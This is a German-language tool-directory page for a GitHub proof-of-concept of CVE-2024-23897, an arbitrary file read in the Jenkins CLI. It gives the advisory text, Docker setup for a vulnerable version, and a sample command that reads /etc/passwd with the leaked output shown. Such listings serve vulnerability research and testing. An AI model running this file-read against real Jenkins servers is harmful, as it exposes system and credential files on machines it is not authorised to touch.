Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-23897 — Dieses Repository stellt einen Proof-of-Concept für CVE-2024-23897 vor. | Kitploit
Tools/GitHubGitHub/vozec/cve-2024-23897
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubvozec/cve-2024-23897

CVE-2024-23897

Dieses Repository stellt einen Proof-of-Concept für CVE-2024-23897 vor.

Repository anzeigen
173vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-23897

Dieses Repository stellt einen Proof-of-Concept von CVE-2024-23897 dar (Entdeckt von sonarsource)

CVE-2024-23897 | Datei lesen in Jenkins

Haftungsausschluss

Dieser Code ist ein Proof-of-Concept der Schwachstelle. Ich ermutige niemanden, ihn auf Confluence-Instanzen zu verwenden, die ihm nicht gehören.
Dieses Tool wurde ausschließlich für Forschungs- und Bildungszwecke entwickelt, und ich übernehme keine Verantwortung für jegliche Nutzung, die davon gemacht wird.

Beschreibung

Laut Jenkins Security Advisory 2024-01-24 : Jenkins verwendet die args4j-Bibliothek, um Befehlsargumente und -optionen auf dem Jenkins-Controller beim Verarbeiten von CLI-Befehlen zu parsen. Dieser Befehlsparser verfügt über eine Funktion, die ein @-Zeichen gefolgt von einem Dateipfad in einem Argument durch den Inhalt der Datei ersetzt (expandAtFiles). Diese Funktion ist standardmäßig aktiviert und Jenkins 2.441 und früher, LTS 2.426.2 und früher deaktivieren sie nicht. Dadurch können Angreifer beliebige Dateien im Dateisystem des Jenkins-Controllers unter Verwendung der Standardzeichenkodierung des Jenkins-Controller-Prozesses lesen.

  • Angreifer mit der Berechtigung Overall/Read können ganze Dateien lesen.
  • Angreifer ohne die Berechtigung Overall/Read können die ersten Zeilen von Dateien lesen.

Hilfe

root@kitploit:~
$ python3 CVE-2024-23897.py -h
usage: CVE-2024-23897.py [-h] -u URL -f FILENAME

This is a POC for CVE-2024-23897 (Jenkins file read)

options:
  -h, --help   show this help message and exit
  -u URL       Url
  -f FILENAME  Filename

Beispiel

root@kitploit:~
docker pull jenkins/jenkins:2.440-jdk17
docker run  -p 8080:8080 jenkins/jenkins:2.440-jdk17
root@kitploit:~
$ python3 CVE-2024-23897.py -u http://127.0.0.1:8080 -f '/etc/passwd'
[+] Trying to recover /etc/passwd
[+] Data recovered:

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
 [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

Referenzen:

  • https://www.jenkins.io/security/advisory/2024-01-24/
  • https://www.sonarsource.com/blog/excessive-expansion-uncovering-critical-security-vulnerabilities-in-jenkins/
  • https://twitter.com/zin_min_phyo/status/1750827780856816063
Tool herunterladen